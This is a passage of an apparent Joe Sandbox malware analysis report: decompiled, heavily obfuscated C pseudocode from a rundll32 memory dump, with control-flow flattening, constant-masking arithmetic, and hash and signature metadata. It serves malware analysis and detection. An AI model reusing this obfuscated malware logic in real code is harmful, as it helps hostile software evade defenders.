                                                                                                                    				_v1100 = _v1100 + 0xffff26d4;
                                                                                                                    				_v1100 = _v1100 ^ 0xfff0a895;
                                                                                                                    				_v1072 = 0xd8d782;
                                                                                                                    				_v1072 = _v1072 + 0xffff857d;
                                                                                                                    				_v1072 = _v1072 ^ 0x00daabd2;
                                                                                                                    				_v1124 = 0x615b7c;
                                                                                                                    				_v1124 = _v1124 >> 0x10;
                                                                                                                    				_v1124 = _v1124 * 0x3d;
                                                                                                                    				_v1124 = _v1124 ^ 0x000147a1;
                                                                                                                    				L1:
                                                                                                                    				while(_t250 != 0x1242b9) {
                                                                                                                    					if(_t250 == 0x56337fc) {
                                                                                                                    						E00346C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
                                                                                                                    						_push(_v1088);
                                                                                                                    						_push( &_v520);
                                                                                                                    						_push(_v1120);
                                                                                                                    						E003513AD(_v1136,  &_v1040, __eflags);
                                                                                                                    						_t283 =  &(_t283[6]);
                                                                                                                    						_t250 = 0x8d6676f;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					if(_t250 == 0x5f94146) {
                                                                                                                    						_push(_v1148);
                                                                                                                    						_push(_v1068);
                                                                                                                    						_t241 = E0034DCF7(_v1084, 0x331000, __eflags);
                                                                                                                    						_t256 =  *0x353e10; // 0x0
                                                                                                                    						_t272 =  *0x353e10; // 0x0
                                                                                                                    						E003347CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
                                                                                                                    						E0033A8B0(_v1064, _t241, _v1076);
                                                                                                                    						_t283 =  &(_t283[9]);
                                                                                                                    						_t250 = 0x56337fc;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					if(_t250 == 0x8d6676f) {
                                                                                                                    						_t244 = E0033B6CF( &_v1040, _v1080, _v1128, _v1116);
                                                                                                                    						__eflags = 0;
                                                                                                                    						 *_t244 = 0;
                                                                                                                    						return E0033B1C6( &_v1040, _v1100, _v1072, _v1124);
                                                                                                                    					}
                                                                                                                    					if(_t250 == 0xbcbde3e) {
                                                                                                                    						_t247 = E0034473C();
                                                                                                                    						L8:
                                                                                                                    						_t250 = 0x5f94146;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					if(_t250 != 0xf4317dc) {
                                                                                                                    						L15:
                                                                                                                    						__eflags = _t250 - 0xfb0317f;
                                                                                                                    						if(__eflags != 0) {
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						return _t247;
                                                                                                                    					}
                                                                                                                    					_t247 = E00333E3F();
                                                                                                                    					goto L8;
                                                                                                                    				}
                                                                                                                    				_t236 =  *0x353e10; // 0x0
                                                                                                                    				__eflags =  *((intOrPtr*)(_t236 + 0x450));
                                                                                                                    				if(__eflags == 0) {
                                                                                                                    					_t250 = 0xf4317dc;
                                                                                                                    					goto L15;
                                                                                                                    				}
                                                                                                                    				_t250 = 0xbcbde3e;
                                                                                                                    				goto L1;
                                                                                                                    			}

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: MC=$g^/h$|[a$/
                                                                                                                    • API String ID: 0-1545830693
                                                                                                                    • Opcode ID: e47bf4ffab7be807d6d083f29f856b9181a712ccf63a2671f00e3dc5503a8594
                                                                                                                    • Instruction ID: c2b23c8c23d26c3928bc53313a09375942a0244b7a87e2dae738d2f441663487
                                                                                                                    • Opcode Fuzzy Hash: e47bf4ffab7be807d6d083f29f856b9181a712ccf63a2671f00e3dc5503a8594
                                                                                                                    • Instruction Fuzzy Hash: EFC10EB11083818FC369CF25C58A91FFBE1BBC4758F508A1DF1969A260D7B59A4ACF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E0034A2E8(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                    				intOrPtr _v4;
                                                                                                                    				intOrPtr* _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				char _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				intOrPtr _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				intOrPtr _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				intOrPtr _t184;
                                                                                                                    				intOrPtr* _t189;
                                                                                                                    				intOrPtr _t193;
                                                                                                                    				intOrPtr _t196;
                                                                                                                    				intOrPtr _t197;
                                                                                                                    				intOrPtr _t198;
                                                                                                                    				intOrPtr _t204;
                                                                                                                    				intOrPtr _t205;
                                                                                                                    				signed int _t223;
                                                                                                                    				signed int _t224;
                                                                                                                    				signed int _t225;
                                                                                                                    				intOrPtr _t226;
                                                                                                                    				void* _t228;
                                                                                                                    				signed int _t229;
                                                                                                                    				intOrPtr _t230;
                                                                                                                    				signed int* _t231;
                                                                                                                    
                                                                                                                    				_t198 = __ecx;
                                                                                                                    				_t231 =  &_v92;
                                                                                                                    				_v8 = __edx;
                                                                                                                    				_v24 = __ecx;
                                                                                                                    				_v28 = 0x24c7b9;
                                                                                                                    				_v28 = _v28 << 9;
                                                                                                                    				_v28 = _v28 ^ 0x498f7200;
                                                                                                                    				_v76 = 0x5897f7;
                                                                                                                    				_v76 = _v76 + 0xffffedf4;
                                                                                                                    				_v76 = _v76 << 0xf;
                                                                                                                    				_v76 = _v76 + 0x73e5;
                                                                                                                    				_v76 = _v76 ^ 0x42f7f56f;
                                                                                                                    				_v52 = 0x46ab19;
                                                                                                                    				_v52 = _v52 << 0xd;
                                                                                                                    				_t228 = 0xe611c04;
                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                    				_t223 = 0x66;
                                                                                                                    				_v52 = _v52 / _t223;
                                                                                                                    				_v52 = _v52 ^ 0x0211beab;
                                                                                                                    				_v80 = 0x97c948;
                                                                                                                    				_v80 = _v80 ^ 0xfb972484;
                                                                                                                    				_v80 = _v80 << 2;
                                                                                                                    				_v80 = _v80 << 0xf;
                                                                                                                    				_v80 = _v80 ^ 0xdb950905;
                                                                                                                    				_v44 = 0x96980f;
                                                                                                                    				_v44 = _v44 ^ 0xfeb8bb56;
                                                                                                                    				_v44 = _v44 ^ 0xfe2f3013;
                                                                                                                    				_v64 = 0x454cfa;
                                                                                                                    				_v64 = _v64 ^ 0x45fe36ac;
                                                                                                                    				_t224 = 0x43;
                                                                                                                    				_v64 = _v64 / _t224;
                                                                                                                    				_v64 = _v64 ^ 0x010b84d0;
                                                                                                                    				_v68 = 0xb73a82;
                                                                                                                    				_v68 = _v68 | 0xd419dac3;
                                                                                                                    				_t225 = 0x23;
                                                                                                                    				_v68 = _v68 / _t225;
                                                                                                                    				_v68 = _v68 ^ 0x061f1f3c;
                                                                                                                    				_v60 = 0xe80863;
                                                                                                                    				_v60 = _v60 * 7;
                                                                                                                    				_v60 = _v60 ^ 0x88fb80a0;
                                                                                                                    				_v60 = _v60 ^ 0x8ea007f2;
                                                                                                                    				_v40 = 0x80f530;
                                                                                                                    				_v40 = _v40 ^ 0xcef24483;
                                                                                                                    				_v40 = _v40 ^ 0xce7935e2;
                                                                                                                    				_v92 = 0x233377;
                                                                                                                    				_v92 = _v92 ^ 0x61e14959;
                                                                                                                    				_v92 = _v92 + 0xffffa5e4;
                                                                                                                    				_v92 = _v92 + 0xf94b;
                                                                                                                    				_v92 = _v92 ^ 0x61c7ad44;
                                                                                                                    				_v88 = 0xbad9cc;
                                                                                                                    				_v88 = _v88 | 0x5a2a09a8;
                                                                                                                    				_v88 = _v88 * 0x2f;
                                                                                                                    				_v88 = _v88 | 0xecc1c683;
                                                                                                                    				_v88 = _v88 ^ 0xecc3849f;
                                                                                                                    				_v56 = 0xb0d301;
                                                                                                                    				_v56 = _v56 + 0xa0bb;
                                                                                                                    				_v56 = _v56 << 0xf;
                                                                                                                    				_v56 = _v56 ^ 0xb9db0742;
                                                                                                                    				_v36 = 0xab48cf;
                                                                                                                    				_v36 = _v36 * 0x24;
                                                                                                                    				_v36 = _v36 ^ 0x1811952a;
                                                                                                                    				_v84 = 0x104632;
                                                                                                                    				_v84 = _v84 + 0x4a21;
                                                                                                                    				_v84 = _v84 ^ 0x8dbd106a;
                                                                                                                    				_v84 = _v84 + 0xfe54;
                                                                                                                    				_v84 = _v84 ^ 0x8daed025;
                                                                                                                    				_t226 = _v4;
                                                                                                                    				_t197 = _v8;
                                                                                                                    				_t230 = _v8;
                                                                                                                    				_v72 = 0x1611ea;
                                                                                                                    				_v72 = _v72 ^ 0xe055e86d;
                                                                                                                    				_v72 = _v72 >> 0xd;
                                                                                                                    				_v72 = _v72 >> 5;
                                                                                                                    				_v72 = _v72 ^ 0x0003993e;
                                                                                                                    				_v32 = 0x799484;
                                                                                                                    				_v32 = _v32 ^ 0xb4488d59;
                                                                                                                    				_v32 = _v32 ^ 0xb439947f;
                                                                                                                    				L1:
                                                                                                                    				while(1) {
                                                                                                                    					do {
                                                                                                                    						while(_t228 != 0x5161e0c) {
                                                                                                                    							if(_t228 == 0xb95f952) {
                                                                                                                    								_t229 = E0034C032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
                                                                                                                    								_t231 =  &(_t231[5]);
                                                                                                                    								_v20 = _t229;
                                                                                                                    								if(_t229 == 0) {
                                                                                                                    									L18:
                                                                                                                    									E00348519(_v72, _v32, _t197);
                                                                                                                    								} else {
                                                                                                                    									_t204 = _v16;
                                                                                                                    									if(_t204 == 0) {
                                                                                                                    										L17:
                                                                                                                    										if(_t229 != 0) {
                                                                                                                    											_t189 = _v8;
                                                                                                                    											 *_t189 = _t197;
                                                                                                                    											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
                                                                                                                    										} else {
                                                                                                                    											goto L18;
                                                                                                                    										}
                                                                                                                    									} else {
                                                                                                                    										_v48 = _v48 + _t204;
                                                                                                                    										_t230 = _t230 - _t204;
                                                                                                                    										if(_t230 != 0) {
                                                                                                                    											L10:
                                                                                                                    											_t184 = _v48;
                                                                                                                    											L11:
                                                                                                                    											_t198 = _v24;
                                                                                                                    											_t228 = 0xb95f952;
                                                                                                                    											continue;
                                                                                                                    										} else {
                                                                                                                    											_t205 = _t226 + _t226;
                                                                                                                    											_push(_t205);
                                                                                                                    											_push(_t205);
                                                                                                                    											_v12 = _t205;
                                                                                                                    											_t193 = E00337FF2(_t205);
                                                                                                                    											_v48 = _t193;
                                                                                                                    											if(_t193 == 0) {
                                                                                                                    												goto L17;
                                                                                                                    											} else {
                                                                                                                    												E0033ED7E(_v88, _t193, _v56, _t197, _t226);
                                                                                                                    												E00348519(_v36, _v84, _t197);
                                                                                                                    												_t197 = _v48;
                                                                                                                    												_t230 = _t226;
                                                                                                                    												_t231 =  &(_t231[4]);
                                                                                                                    												_t196 = _t197 + _t226;
                                                                                                                    												_t226 = _v12;
                                                                                                                    												_v48 = _t196;
                                                                                                                    												if(_t230 == 0) {
                                                                                                                    													goto L17;
                                                                                                                    												} else {
                                                                                                                    													goto L10;
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								if(_t228 != 0xe611c04) {
                                                                                                                    									goto L15;
                                                                                                                    								} else {
                                                                                                                    									_t228 = 0x5161e0c;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							L20:
                                                                                                                    							return _t229;
                                                                                                                    						}
                                                                                                                    						_t226 = 0x10000;
                                                                                                                    						_push(_t198);
                                                                                                                    						_push(_t198);
                                                                                                                    						_t184 = E00337FF2(0x10000);
                                                                                                                    						_t197 = _t184;
                                                                                                                    						if(_t197 == 0) {
                                                                                                                    							_t198 = _v24;
                                                                                                                    							_t228 = 0xa3056fc;
                                                                                                                    							goto L15;
                                                                                                                    						} else {
                                                                                                                    							_v48 = _t184;
                                                                                                                    							_t230 = 0x10000;
                                                                                                                    							goto L11;
                                                                                                                    						}
                                                                                                                    						goto L20;
                                                                                                                    						L15:
                                                                                                                    						_t184 = _v48;
                                                                                                                    					} while (_t228 != 0xa3056fc);
                                                                                                                    					_t229 = _v20;
                                                                                                                    					goto L17;
                                                                                                                    				}
                                                                                                                    			}










































                                                                                                                    0x00000000
                                                                                                                    0x0034a576
                                                                                                                    0x0034a576
                                                                                                                    0x0034a57a
                                                                                                                    0x0034a57c
                                                                                                                    0x0034a5df
                                                                                                                    0x0034a5df
                                                                                                                    0x0034a5e3
                                                                                                                    0x0034a5e3
                                                                                                                    0x0034a5e7
                                                                                                                    0x00000000
                                                                                                                    0x0034a57e
                                                                                                                    0x0034a582
                                                                                                                    0x0034a58f
                                                                                                                    0x0034a590
                                                                                                                    0x0034a591
                                                                                                                    0x0034a595
                                                                                                                    0x0034a59a
                                                                                                                    0x0034a5a2
                                                                                                                    0x00000000
                                                                                                                    0x0034a5a8
                                                                                                                    0x0034a5b4
                                                                                                                    0x0034a5c2
                                                                                                                    0x0034a5c7
                                                                                                                    0x0034a5cb
                                                                                                                    0x0034a5cd
                                                                                                                    0x0034a5d0
                                                                                                                    0x0034a5d3
                                                                                                                    0x0034a5d7
                                                                                                                    0x0034a5dd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034a5dd
                                                                                                                    0x0034a5a2
                                                                                                                    0x0034a57c
                                                                                                                    0x0034a570
                                                                                                                    0x0034a52d
                                                                                                                    0x0034a533
                                                                                                                    0x00000000
                                                                                                                    0x0034a539
                                                                                                                    0x0034a539
                                                                                                                    0x00000000
                                                                                                                    0x0034a539
                                                                                                                    0x0034a533
                                                                                                                    0x0034a65d
                                                                                                                    0x0034a665
                                                                                                                    0x0034a665
                                                                                                                    0x0034a5f5
                                                                                                                    0x0034a604
                                                                                                                    0x0034a605
                                                                                                                    0x0034a606
                                                                                                                    0x0034a60b
                                                                                                                    0x0034a611
                                                                                                                    0x0034a61b
                                                                                                                    0x0034a61f
                                                                                                                    0x00000000
                                                                                                                    0x0034a613
                                                                                                                    0x0034a613
                                                                                                                    0x0034a617
                                                                                                                    0x00000000
                                                                                                                    0x0034a617
                                                                                                                    0x00000000
                                                                                                                    0x0034a624
                                                                                                                    0x0034a624
                                                                                                                    0x0034a628
                                                                                                                    0x0034a634
                                                                                                                    0x00000000
                                                                                                                    0x0034a634

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !J$YIa$mU$s
                                                                                                                    • API String ID: 0-3335770892
                                                                                                                    • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                    • Instruction ID: b8541b07737bcd142913ab2132fea5eced50eba53a9643523598cbaf6a79f19e
                                                                                                                    • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                    • Instruction Fuzzy Hash: 549140B19093409BC355CF29C18580BFBF1BBC5758F548A1EF9959B260D3B8EA09CB83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00334EE3(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				intOrPtr _v88;
                                                                                                                    				char _v608;
                                                                                                                    				void* _t203;
                                                                                                                    				void* _t204;
                                                                                                                    				void* _t207;
                                                                                                                    				signed int _t212;
                                                                                                                    				signed int _t213;
                                                                                                                    				signed int _t214;
                                                                                                                    				signed int _t215;
                                                                                                                    				intOrPtr _t216;
                                                                                                                    				void* _t221;
                                                                                                                    
                                                                                                                    				_v84 = _v84 & 0x00000000;
                                                                                                                    				_v88 = 0xf9097a;
                                                                                                                    				_v32 = 0xbcbe1d;
                                                                                                                    				_v32 = _v32 << 9;
                                                                                                                    				_v32 = _v32 << 9;
                                                                                                                    				_v32 = _v32 << 0xb;
                                                                                                                    				_v32 = _v32 ^ 0xa0062323;
                                                                                                                    				_v16 = 0x782140;
                                                                                                                    				_v16 = _v16 + 0xfffffe34;
                                                                                                                    				_v16 = _v16 + 0xfffffe18;
                                                                                                                    				_v16 = _v16 << 0xa;
                                                                                                                    				_v16 = _v16 ^ 0xe0701d9a;
                                                                                                                    				_v40 = 0x7af846;
                                                                                                                    				_v40 = _v40 + 0xffff28b3;
                                                                                                                    				_v40 = _v40 << 0xd;
                                                                                                                    				_v40 = _v40 + 0xffffd351;
                                                                                                                    				_v40 = _v40 ^ 0x441384bc;
                                                                                                                    				_v68 = 0xebfd4;
                                                                                                                    				_v68 = _v68 + 0xffff2b98;
                                                                                                                    				_t212 = 0x4b;
                                                                                                                    				_v68 = _v68 / _t212;
                                                                                                                    				_v68 = _v68 ^ 0x000f3184;
                                                                                                                    				_v48 = 0x77c678;
                                                                                                                    				_t213 = 0x72;
                                                                                                                    				_v48 = _v48 * 0x4d;
                                                                                                                    				_v48 = _v48 + 0x6b8c;
                                                                                                                    				_v48 = _v48 ^ 0x240efbe4;
                                                                                                                    				_v24 = 0xae1064;
                                                                                                                    				_v24 = _v24 / _t213;
                                                                                                                    				_v24 = _v24 << 7;
                                                                                                                    				_v24 = _v24 ^ 0x1be7fa9d;
                                                                                                                    				_v24 = _v24 ^ 0x1b226397;
                                                                                                                    				_v72 = 0x44bde7;
                                                                                                                    				_v72 = _v72 | 0x5f63ee23;
                                                                                                                    				_v72 = _v72 ^ 0x5f6de837;
                                                                                                                    				_v56 = 0x5a94a4;
                                                                                                                    				_v56 = _v56 >> 9;
                                                                                                                    				_t214 = 0xc;
                                                                                                                    				_v56 = _v56 * 0x2a;
                                                                                                                    				_v56 = _v56 ^ 0x0003dc1b;
                                                                                                                    				_v8 = 0x2a4d30;
                                                                                                                    				_v8 = _v8 + 0xff2b;
                                                                                                                    				_v8 = _v8 | 0x9a82811b;
                                                                                                                    				_v8 = _v8 << 0xc;
                                                                                                                    				_v8 = _v8 ^ 0xbcdbc31f;
                                                                                                                    				_v64 = 0xa41a91;
                                                                                                                    				_v64 = _v64 | 0x62aa1889;
                                                                                                                    				_v64 = _v64 << 0xd;
                                                                                                                    				_v64 = _v64 ^ 0xc357e7aa;
                                                                                                                    				_v36 = 0x90fe9;
                                                                                                                    				_v36 = _v36 >> 0xa;
                                                                                                                    				_v36 = _v36 | 0x57d87c49;
                                                                                                                    				_v36 = _v36 / _t214;
                                                                                                                    				_v36 = _v36 ^ 0x0755636a;
                                                                                                                    				_v28 = 0x5fda7e;
                                                                                                                    				_v28 = _v28 + 0xffff2d0f;
                                                                                                                    				_v28 = _v28 << 0xa;
                                                                                                                    				_v28 = _v28 + 0xdffb;
                                                                                                                    				_v28 = _v28 ^ 0x7c1a8a5e;
                                                                                                                    				_v20 = 0xaf632f;
                                                                                                                    				_v20 = _v20 >> 8;
                                                                                                                    				_v20 = _v20 << 9;
                                                                                                                    				_v20 = _v20 >> 0xf;
                                                                                                                    				_v20 = _v20 ^ 0x0003fa93;
                                                                                                                    				_v12 = 0x960758;
                                                                                                                    				_v12 = _v12 ^ 0x64ee01f0;
                                                                                                                    				_v12 = _v12 | 0x3d3dd2ba;
                                                                                                                    				_v12 = _v12 << 7;
                                                                                                                    				_v12 = _v12 ^ 0xbeed48c5;
                                                                                                                    				_v80 = 0xba0fdf;
                                                                                                                    				_v80 = _v80 + 0xfd2d;
                                                                                                                    				_v80 = _v80 ^ 0x00b93168;
                                                                                                                    				_v60 = 0x5f834c;
                                                                                                                    				_v60 = _v60 ^ 0x963b7b6a;
                                                                                                                    				_t215 = 0x3f;
                                                                                                                    				_v60 = _v60 * 0x3e;
                                                                                                                    				_v60 = _v60 ^ 0x6c73d449;
                                                                                                                    				_v76 = 0x4b89c6;
                                                                                                                    				_v76 = _v76 >> 6;
                                                                                                                    				_v76 = _v76 ^ 0x0008f57a;
                                                                                                                    				_v52 = 0x3d488e;
                                                                                                                    				_v52 = _v52 << 6;
                                                                                                                    				_v52 = _v52 << 8;
                                                                                                                    				_v52 = _v52 ^ 0x5226582a;
                                                                                                                    				_v44 = 0x8cf369;
                                                                                                                    				_v44 = _v44 ^ 0x25329c0c;
                                                                                                                    				_v44 = _v44 / _t215;
                                                                                                                    				_v44 = _v44 >> 0xe;
                                                                                                                    				_v44 = _v44 ^ 0x0005c7da;
                                                                                                                    				_t216 =  *0x353e10; // 0x0
                                                                                                                    				_t203 = E0033B6CF(_t216 + 0x1c, _v32, _v16, _v40);
                                                                                                                    				_t241 = _a4 + 0x2c;
                                                                                                                    				_t204 = E0033B23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
                                                                                                                    				_t248 = _t204;
                                                                                                                    				if(_t204 != 0) {
                                                                                                                    					_push(_v64);
                                                                                                                    					_push(_v8);
                                                                                                                    					_t207 = E0034DCF7(_v56, 0x331000, _t248);
                                                                                                                    					_pop(_t221);
                                                                                                                    					E003347CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
                                                                                                                    					E0033A8B0(_v60, _t207, _v76);
                                                                                                                    					E00341F8A(_v52, _v44,  &_v608);
                                                                                                                    				}
                                                                                                                    				return 1;
                                                                                                                    			}


                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpi
                                                                                                                    • String ID: *X&R$0M*$7m_$@!x
                                                                                                                    • API String ID: 1586166983-4050865940
                                                                                                                    • Opcode ID: cf76ed883e2c517cea4e06fbbad761ca52339e0a87214bfdeeab675a706427df
                                                                                                                    • Instruction ID: b647e2f311eab43e4243e87d0b142f4af5856e780e806739e93239b3ca75e2f8
                                                                                                                    • Opcode Fuzzy Hash: cf76ed883e2c517cea4e06fbbad761ca52339e0a87214bfdeeab675a706427df
                                                                                                                    • Instruction Fuzzy Hash: 1D81F272C0121DABCF49DFA1D88A8EEFBB1FB54718F208118E511B6260D7B55A4ACF54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E0033EA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                    				signed int _v4;
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				void* _t136;
                                                                                                                    				signed int _t147;
                                                                                                                    				void* _t150;
                                                                                                                    				intOrPtr* _t152;
                                                                                                                    				void* _t154;
                                                                                                                    				void* _t165;
                                                                                                                    				signed int _t166;
                                                                                                                    				signed int _t167;
                                                                                                                    				signed int* _t171;
                                                                                                                    
                                                                                                                    				_push(_a16);
                                                                                                                    				_t152 = __edx;
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t136);
                                                                                                                    				_v52 = 0x4b44d9;
                                                                                                                    				_t171 =  &(( &_v68)[6]);
                                                                                                                    				_t165 = 0;
                                                                                                                    				_t154 = 0x40ad1f2;
                                                                                                                    				_t166 = 0x41;
                                                                                                                    				_v52 = _v52 * 0x5c;
                                                                                                                    				_v52 = _v52 ^ 0xd486af61;
                                                                                                                    				_v52 = _v52 ^ 0xcf8a129f;
                                                                                                                    				_v24 = 0x8b17cc;
                                                                                                                    				_v24 = _v24 + 0xffff02b5;
                                                                                                                    				_v24 = _v24 ^ 0x008a1a91;
                                                                                                                    				_v64 = 0xcc4e1;
                                                                                                                    				_v64 = _v64 ^ 0x71537a57;
                                                                                                                    				_v64 = _v64 | 0xbc84d226;
                                                                                                                    				_v64 = _v64 + 0x8a58;
                                                                                                                    				_v64 = _v64 ^ 0xbde0890e;
                                                                                                                    				_v12 = 0x10173e;
                                                                                                                    				_v12 = _v12 / _t166;
                                                                                                                    				_v12 = _v12 ^ 0x000bb2e7;
                                                                                                                    				_v16 = 0xcbf18d;
                                                                                                                    				_v16 = _v16 + 0x7f8c;
                                                                                                                    				_v16 = _v16 ^ 0x00cd0dea;
                                                                                                                    				_v20 = 0x7a67ce;
                                                                                                                    				_v20 = _v20 << 1;
                                                                                                                    				_v20 = _v20 ^ 0x00fa626e;
                                                                                                                    				_v68 = 0x7779f8;
                                                                                                                    				_v68 = _v68 + 0xa85e;
                                                                                                                    				_v68 = _v68 << 0x10;
                                                                                                                    				_v68 = _v68 >> 3;
                                                                                                                    				_v68 = _v68 ^ 0x0443aeb4;
                                                                                                                    				_v28 = 0xee6391;
                                                                                                                    				_v28 = _v28 ^ 0x2bfa2339;
                                                                                                                    				_v28 = _v28 ^ 0x2b1bacd2;
                                                                                                                    				_v32 = 0x87b642;
                                                                                                                    				_v32 = _v32 + 0xffff3baa;
                                                                                                                    				_v32 = _v32 ^ 0x008fda80;
                                                                                                                    				_v36 = 0x3b697f;
                                                                                                                    				_v36 = _v36 | 0x5675f49c;
                                                                                                                    				_v36 = _v36 ^ 0x5679bffa;
                                                                                                                    				_v40 = 0x254a84;
                                                                                                                    				_v40 = _v40 * 0x67;
                                                                                                                    				_v40 = _v40 ^ 0x0f0bd396;
                                                                                                                    				_v44 = 0xfc206d;
                                                                                                                    				_v44 = _v44 * 0x45;
                                                                                                                    				_v44 = _v44 ^ 0x43f6aa11;
                                                                                                                    				_v56 = 0x3dd941;
                                                                                                                    				_v56 = _v56 ^ 0x94d2d45c;
                                                                                                                    				_v56 = _v56 >> 9;
                                                                                                                    				_v56 = _v56 ^ 0x00419011;
                                                                                                                    				_v4 = 0xdcf5c3;
                                                                                                                    				_v4 = _v4 ^ 0x0d464ae6;
                                                                                                                    				_v4 = _v4 ^ 0x0d938ce3;
                                                                                                                    				_v60 = 0xe23f0;
                                                                                                                    				_v60 = _v60 ^ 0x0435e191;
                                                                                                                    				_v60 = _v60 ^ 0xbde67646;
                                                                                                                    				_v60 = _v60 ^ 0xb922f804;
                                                                                                                    				_v60 = _v60 ^ 0x00f2260b;
                                                                                                                    				_v8 = 0x523a90;
                                                                                                                    				_v8 = _v8 * 0x75;
                                                                                                                    				_v8 = _v8 ^ 0x259e6962;
                                                                                                                    				_v48 = 0x46565e;
                                                                                                                    				_t167 = 3;
                                                                                                                    				_v48 = _v48 * 0x6a;
                                                                                                                    				_t168 = _v4;
                                                                                                                    				_v48 = _v48 / _t167;
                                                                                                                    				_v48 = _v48 ^ 0x09b4f31e;
                                                                                                                    				do {
                                                                                                                    					while(_t154 != 0x40ad1f2) {
                                                                                                                    						if(_t154 == 0x458d12f) {
